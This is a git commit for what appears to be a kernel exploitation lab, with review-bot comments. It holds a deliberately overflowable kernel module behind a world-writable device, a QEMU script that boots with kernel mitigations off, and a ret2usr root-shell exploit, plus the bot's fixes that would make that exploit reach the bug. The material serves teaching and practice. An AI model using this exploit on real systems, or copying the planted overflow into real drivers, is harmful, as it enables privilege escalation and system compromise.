
Commit dbae17d

committed
initial commit
0 parents  commit dbae17d


9 files changed

+193
-0
lines changed


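--- /dev/null
+++ b/environment/Dockerfile
@@ -0,0 +1,2 @@
+FROM ubuntu:22.04
+RUN apt update && apt install -y zstd cpio python3 git fakeroot build-essential ncurses-dev xz-utils libssl-dev bc flex libelf-dev bison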
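Review bot: The `RUN apt update && apt install -y …` line uses the interactive `apt` front end and leaves the package lists in the image layer; the scriptable form is `RUN apt-get update && apt-get install -y --no-install-recommends zstd cpio python3 git fakeroot build-essential ncurses-dev xz-utils libssl-dev bc flex libelf-dev bison && rm -rf /var/lib/apt/lists/*`. The package set is the usual kernel-build tool chain, which suggests the kernel module is meant to be built inside this container, but nothing here copies or mounts the sources, so a comment stating how the repository is expected to be mounted would help the next user. `ubuntu:22.04` is a floating tag, so the gcc version can drift between builds and with it the stack-frame layout that the hard-coded offset in `exploits/vuln1/vuln1_exploit.c` presumably depends on; consider pinning the image digest or recording the gcc version used.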

environment/initramfs.cpio.gz

2.4 MB
Binary file not shown.

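--- /dev/null
+++ b/environment/start.sh
@@ -0,0 +1,9 @@
+qemu-system-x86_64 -kernel vmlinuz-5.13.19 \
+-nographic \
+-initrd initramfs.cpio.gz \
+-m 512 \
+-cpu kvm64 \
+-s \
+-append "console=ttyS0 nokaslr nopti nosmep nosmap quiet panic=1"
+
+# freeze cpu on startup -S \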
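Review bot: `-s` is shorthand for `-gdb tcp::1234`, which listens on every interface, so anyone who can reach the host gets a GDB stub with full read/write access to guest memory; bind it to loopback with `-gdb tcp:127.0.0.1:1234` instead. The `-append` line switches off KASLR, PTI, SMEP and SMAP — that is what lets the exploit in this commit use absolute kernel addresses and return into a user-space function — and deserves a comment saying so, e.g. `# mitigations disabled on purpose: the exploit hard-codes symbol addresses and returns to user-space code`. The script has no shebang and refers to `vmlinuz-5.13.19` and `initramfs.cpio.gz` relative to the current directory, so it only works when run from `environment/`; `#!/bin/sh` plus `cd "$(dirname "$0")"` would make it robust. The trailing `# freeze cpu on startup -S \` ends in a stray backslash and reads better as `# add -S to freeze the CPU until gdb attaches`.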

environment/vmlinuz-5.13.19

8.42 MB
Binary file not shown.

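--- /dev/null
+++ b/exploits/vuln1/Makefile
@@ -0,0 +1,10 @@
+##
+# Project Title
+#
+# @file
+# @version 0.1
+
+default:
+	gcc vuln1_exploit.c -static -o vuln1_exploit
+
+# end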
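Review bot: The header comment is an unfilled template (`# Project Title`, `# @file`, `# @version 0.1`) and should either describe the target, e.g. `# Build the vuln1 exploit as a static binary so it runs from the QEMU initramfs`, or be dropped. `default` is not declared `.PHONY`, and the compile line enables no warnings; `gcc -Wall -Wextra -static -o vuln1_exploit vuln1_exploit.c` would surface the `void main()` and newline-less `printf` in `vuln1_exploit.c`. `-static` is presumably there because the initramfs carries no shared libc — if so, a one-line comment would save the next reader from wondering.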

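--- /dev/null
+++ b/exploits/vuln1/vuln1_exploit.c
@@ -0,0 +1,89 @@
+#include "stdlib.h"
+#include "stdio.h"
+#include "string.h"
+#include <fcntl.h>
+#include <unistd.h>
+#include <sys/ioctl.h>
+
+#define IOCTL_VULN1_WRITE 4141
+#define COMMIT_CREDS_ADDRESS 0xffffffff810d26f0ul
+#define PREPARE_KERNEL_CRED_ADDRESS 0xffffffff810d2950ul
+
+typedef int (* t_commit_creds)(void *);
+typedef void *(* t_prepare_kernel_cred)(void *);
+
+t_commit_creds commit_creds = (t_commit_creds)COMMIT_CREDS_ADDRESS;
+t_prepare_kernel_cred prepare_kernel_cred = (t_prepare_kernel_cred)PREPARE_KERNEL_CRED_ADDRESS;
+
+unsigned long u_cs;
+unsigned long u_ss;
+unsigned long u_rsp;
+unsigned long u_rflags;
+unsigned long u_rip;
+
+void start_sh() {
+    char *args[] = {"/bin/sh", "-i", NULL};
+    execve("/bin/sh", args, NULL);
+}
+
+void save_state() {
+    __asm__(
+        ".intel_syntax noprefix;"
+        "mov u_cs, cs;"
+        "mov u_ss, ss;"
+        "mov u_rsp, rsp;"
+        "pushf;"
+        "pop u_rflags;"
+        ".att_syntax;"
+    );
+    u_rip = (unsigned long)&start_sh;
+}
+
+void restore_state() {
+    __asm__(
+        ".intel_syntax noprefix;"
+        "swapgs;""push u_ss;" // restore gs reg and push all
+        "push u_rsp;" // other values to the stack
+        "push u_rflags;"
+        "push u_cs;"
+        "push u_rip;" // points to start_sh
+        "iretq;"
+        ".att_syntax;"
+    );
+}
+
+
+void exploit(){
+
+    commit_creds(prepare_kernel_cred(NULL));
+
+    restore_state();
+
+}
+
+void ioctl_write(int fd){
+
+    char buffer[512];
+    memset(buffer, 0x41, sizeof(buffer));
+
+    // overwrite return address
+    *(unsigned long *)&buffer[0x108] = (unsigned long) &exploit;
+
+    //save user state
+    save_state();
+    ioctl(fd, IOCTL_VULN1_WRITE, &buffer);
+}
+
+void main()
+{
+    int fd;
+
+    fd = open("/dev/vuln1", 0);
+    if (fd < 0) {
+        printf ("Cannot open device file");
+        exit(-1);
+    }
+
+    ioctl_write(fd);
+    close(fd);
+}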
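Review bot: The exploit opens `/dev/vuln1` and sends ioctl `4141`, but the module added in this same commit registers its misc device as `"vuln"` and dispatches only on `IOCTL_VULN_WRT 1337`, so as written `open()` fails (or, if a `/dev/vuln1` node exists in the initramfs, the ioctl returns -EINVAL) and the overflow is never reached; change them to `#define IOCTL_VULN1_WRITE 1337` and `fd = open("/dev/vuln", O_RDONLY);`. The hard-coded `COMMIT_CREDS_ADDRESS`/`PREPARE_KERNEL_CRED_ADDRESS` and the `0x108` return-address offset are only valid for the committed vmlinuz-5.13.19 booted with `nokaslr` and for a module built with `-fno-stack-protector` (presumably 256-byte buffer plus saved rbp), so record their provenance, e.g. `// from System.map of vmlinuz-5.13.19; requires nokaslr on the command line`. `exploit()` and `restore_state()` execute at user-space addresses in ring 0 and read the `u_*` globals from user memory, which only works because the VM boots with `nosmep nosmap`; that dependency belongs in a comment above `restore_state`. Smaller points: `void main()` should be `int main(void)`, the `printf` message lacks a newline and is better as `perror("open /dev/vuln")`, and `&buffer` in the `ioctl` call should be `buffer`.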

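--- /dev/null
+++ b/modules/vuln1/Makefile
@@ -0,0 +1,19 @@
+obj-m := vuln1.o
+KDIR := /lib/modules/$(shell uname -r)/build
+PWD := $(shell pwd)
+
+# Don't create .text.unlikely/.text.hot sections.
+EXTRA_CFLAGS += -fno-reorder-functions
+
+# Disable stack protector to allow exploiting stack buffer overflows.
+EXTRA_CFLAGS += -fno-stack-protector
+
+EXTRA_CFLAGS += -g -DDEBUG
+ccflags-y += ${EXTRA_CFLAGS}
+CC += ${EXTRA_CFLAGS}
+
+default:
+	$(MAKE) -C $(KDIR) M=$(PWD) SUBDIRS=$(PWD) modules
+
+clean:
+	$(MAKE) -C $(KDIR) M=$(PWD) SUBDIRS=$(PWD) clean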
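Review bot: `KDIR := /lib/modules/$(shell uname -r)/build` builds against whatever kernel the build host happens to run, while `environment/start.sh` boots the committed `vmlinuz-5.13.19`; unless the host runs exactly that kernel the resulting `vuln1.ko` is refused at insmod for a vermagic mismatch, so make the path overridable and document the intended tree, e.g. `KDIR ?= /lib/modules/$(shell uname -r)/build` with `# point KDIR at the 5.13.19 source tree the VM kernel was built from`. `CC += ${EXTRA_CFLAGS}` appends the same flags to the compiler command that `ccflags-y += ${EXTRA_CFLAGS}` already passes, so every flag appears twice on the command line; drop the `CC` line. `SUBDIRS=$(PWD)` is the pre-`M=` spelling and appears to be ignored by kbuild of this vintage, and `default`/`clean` should be declared `.PHONY`. The `-fno-stack-protector` comment is good; the `-fno-reorder-functions` one would be more useful if it said why the section placement matters here (presumably to keep `vuln1_do_breakstuff`'s frame layout predictable).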

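--- /dev/null
+++ b/modules/vuln1/vuln1.c
@@ -0,0 +1,64 @@
+#include <linux/compiler.h>
+#include <linux/fs.h>
+#include <linux/kernel.h>
+#include <linux/miscdevice.h>
+#include <linux/module.h>
+#include <linux/uaccess.h>
+
+
+MODULE_DESCRIPTION("vuln1 buffer overflow");
+MODULE_AUTHOR("sashs");
+MODULE_LICENSE("GPL");
+
+#define IOCTL_VULN_WRT 1337
+
+static int vuln1_open(struct inode *inode, struct file *file)
+{
+	return 0;
+}
+
+static int vuln1_release(struct inode *inodep, struct file *filp)
+{
+	return 0;
+}
+
+static noinline int vuln1_do_breakstuff(unsigned long addr)
+{
+	char buffer[256];
+	volatile int size = 512;
+
+	return _copy_from_user(&buffer, (void __user *)addr, size);
+}
+
+static long vuln1_ioctl(struct file *fd, unsigned int cmd, unsigned long value)
+{
+	long to_return;
+
+	switch (cmd) {
+	case IOCTL_VULN_WRT:
+		to_return = vuln1_do_breakstuff(value);
+		break;
+	default:
+		to_return = -EINVAL;
+		break;
+	}
+
+	return to_return;
+}
+
+static const struct file_operations vuln1_fops = {
+	.owner = THIS_MODULE,
+	.open = vuln1_open,
+	.unlocked_ioctl = vuln1_ioctl,
+	.release = vuln1_release,
+	.llseek = no_llseek,
+};
+
+struct miscdevice vuln1_device = {
+	.minor = MISC_DYNAMIC_MINOR,
+	.name = "vuln",
+	.mode = S_IRUGO | S_IWUGO,
+	.fops = &vuln1_fops,
+};
+
+module_misc_device(vuln1_device);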
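Review bot: The deliberate bug is undocumented: `vuln1_do_breakstuff` copies `size` = 512 user bytes into a 256-byte stack `buffer`, `size` is `volatile` (presumably so the compiler cannot fold the constant and flag the overflow at build time), and `_copy_from_user` is the underscore variant that skips the hardened-usercopy object-size check a plain `copy_from_user` would apply — each is a conscious choice and should carry a one-line comment, plus a file header stating that the module is intentionally vulnerable and must only be loaded inside the lab VM. `.mode = S_IRUGO | S_IWUGO` makes `/dev/vuln` world-writable, which is what lets an unprivileged process reach the overflow; say so next to it, e.g. `/* world-writable on purpose: the target must be reachable from an unprivileged shell */`, so it does not read as an oversight. `struct miscdevice vuln1_device` should be `static`, and the device name `"vuln"` and ioctl `1337` here do not match the `/dev/vuln1` and `4141` used by `exploits/vuln1/vuln1_exploit.c` in this commit, so one side has to change. `&buffer` in the copy call has type `char (*)[256]`; plain `buffer` is the idiomatic argument.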

modules/vuln1/vuln1.ko

197 KB
Binary file not shown.
